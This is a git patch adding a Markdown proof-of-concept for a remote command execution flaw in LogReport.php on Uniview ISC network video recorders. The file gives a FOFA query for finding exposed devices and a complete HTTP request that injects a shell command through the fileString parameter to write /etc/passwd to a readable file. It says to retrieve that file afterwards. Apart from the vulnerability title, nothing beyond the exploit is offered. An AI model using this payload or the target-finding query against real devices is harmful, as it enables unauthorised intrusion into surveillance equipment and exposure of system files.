From ce189bbea06924193c09b8e59a54c1299bd33022 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 27 Dec 2023 20:28:12 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=99=E6=B1=9F=E5=AE=87=E8=A7=86is?= =?UTF-8?q?c=E7=BD=91=E7=BB=9C=E8=A7=86=E9=A2=91=E5=BD=95=E5=83=8F?= =?UTF-8?q?=E6=9C=BALogReport.php=E5=AD=98=E5=9C=A8=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...视频录像机LogReport.php存在远程命令执行漏洞.md | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md diff --git a/浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md b/浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md new file mode 100644 index 0000000..008017f --- /dev/null +++ b/浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md @@ -0,0 +1,24 @@ +## 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞 + +## fofa +``` +body="Alarm" && body="白牌定制" +``` + +## poc +``` +GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;cat+/etc/passwd%3Echeck.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=f952f704362e34231e810533d889f5fb; logintime=-; devLanguage=zh-CN +Upgrade-Insecure-Requests: 1 +``` +![4d5533d9c9f7ebfa9059b092a2b109b5](https://github.com/wy876/POC/assets/139549762/e3743a6c-346e-4615-86a6-40318176d9f0) + +然后访问路径 : + +/Interface/LogReport/check.txt